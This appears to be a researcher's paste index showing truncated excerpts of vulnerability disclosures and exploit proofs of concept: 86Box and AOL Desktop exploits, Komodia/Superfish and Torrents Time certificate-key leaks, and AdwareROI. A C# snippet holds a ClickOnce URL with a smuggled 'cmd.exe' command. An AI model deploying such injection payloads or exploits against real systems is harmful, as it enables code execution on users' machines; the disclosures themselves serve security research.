Wack0

; Input	MD5   :	614D07EF7777CFF5CFDF741587A097DA
; Input	CRC32 :	B326AB6B

; ---------------------------------------------------------------------------
; File Name   :	C:\Users\raylee\nit - Copy.bin
; Format      :	Binary file
; Base Address:	0000h Range: 0000h - 02FCh Loaded length: 02FCh

		.686p
		.mmx

Wack0

<?php
/*
	Updated version, 2016-12-02: fixed shellcode so it *actually* works on QEMU
	usermode emulation (seems I pushed an old version), and removed debug output.
	
	-------------------------
	
	NB: THIS PoC ONLY WORKS IN QEMU USERMODE EMULATION!
	If anyone wants to fix this, go ahead (no pun intended).
	However, I don't have a vulnerable product and am unwilling to acquire one.

Wack0

using System;
using System.Runtime.InteropServices;

class DPPwned {

	[DllImport("dfshim.dll")]
	public static extern int LaunchApplication([MarshalAs(UnmanagedType.LPWStr)] string deploymentUrl,int data,int flags);
	
	public static void Main() {
		LaunchApplication("https://onestepfreinstaller.blob.core.windows.net/installer/DPLauncher.application?SelectedItems=%22+%2FC%3A%22cmd.exe+%2Fk+echo+pwned+%26%26+rem+",0,0);

Wack0

<?php
/*
	Heap Overflow in .TD0 File Parser in 86Box build 204/205 (200c966/d3d2699) can cause code execution
	calc.exe PoC for both builds (the x86 AMD and Intel binaries!)
	a *Ring of Lightning* production by slipstream/RoL!
	
	Please note that due to lack of available hardware, exploitation of the AMD binaries has not been tested.
  So you may have to fix that yourself.
	
	86Box is a fork of PCem maintained by Battler aka Tenshi aka Kiririn/RoL.

Wack0

AdwareROI

AdwareROI is basically the world's shittiest MiTM malware ever.

It's being sold for $5.5k for one panel/binary, $16k for multiple panels/binaries, and probably ten times that if you want src too. That doesn't include the SSL MiTM functionality which is another $1k.

And.. as I said, it's shitty. The MiTM functionality relies on WinDivert, the SSL MiTM uses a custom component, which is (seriously!) called mitm_test_poc. And it uses a hardcoded CA cert and private key, that's installed with the other components.

So, what to do but disclose these as I obtain them?

Wack0

Torrents Time bundles certificates and private keys

So, with all the news about how Torrents Time is insecure.. I figured I might as well reverse it.

It seems to have three components, one (on windows) is a native service (TTService.exe) that runs as SYSTEM, another (TTPlayer.exe) runs under a lower privileged user. There's also a nodejs application, server.js.

The native service seems to set up a localhost HTTPd, on either port 12400, 11400, 10400 or 9400, using whichever is open.

So, I browsed to it, and was astonished to discover it was running with TLS, and gave the browser a valid certificate, signed by Thawte! (the cert was issued to localhost.ttconfig.xyz, obviously to work around new CA rules. For the record, it currently resolves to 127.0.0.1 as you'd probably expect.)

Wack0

/*
 ayy-oh-lmao.js
 AOL Desktop <= 9.8.0 File Write and Remote Command Execution via MITM
 AOL Desktop <= 9.8.1 File Write via MITM.
 by slipstream/RoL, between August and December 2015.
 irc.rol.im #rol ** http://rol.im/chat/ ** twitter @TheWack0lian
 
 The custom AOL protocol, includes a scripting language called FDO91 (FDO), that's compiled into a bytecode.
 Compiled FDO makes up part of the data sent from server to client and client to server.
 

Wack0

Database: heroku_1ed5a148e6d9415
Table: black_cards
[16 entries]
+----+--------------------------------------------------------------------------------------------------------------+
| id | content                                                                                                      |
+----+--------------------------------------------------------------------------------------------------------------+
| 1  | _____ means never having to say you're sorry.                                                                |
| 2  | The pen tester found _____ in the trash while dumpster diving.                                               |
| 3  | Our CIO has a framed a picture of _____.                                                                     |
| 4  | 9 out of 10 experts agree, _____ will increase your security effectiveness.                                  |

Wack0

First off: this is the first time I "seriously" reversed a kernel-mode NT driver, so keep that in mind when you read this..

The Komodia rootkit config is located in a certain registry entry that's hardcoded in the driver. For Qustodio, it's HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\qwd\Data.

The config structure is simple enough. An array of the following structure:

DWORD type;
BYTE unknown[32]; // I don't see anywhere that the driver actually *reads* any of this part,
 // at least, not after writing to it first.

Wack0

Superfish uses an SDK from Komodia to do SSL MITM. That's probably known by now.

Superfish isn't the only product to use that sdk. there's others too.

Each product that uses the Komodia SDK to MITM, has its OWN CA cert and private
key pair. Seems a lot of people think they all use the superfish cert. That is
NOT the case.

First thing I checked was komodia's own parental control software,
Keep My Family Secure. (mentioned on komodia's own website).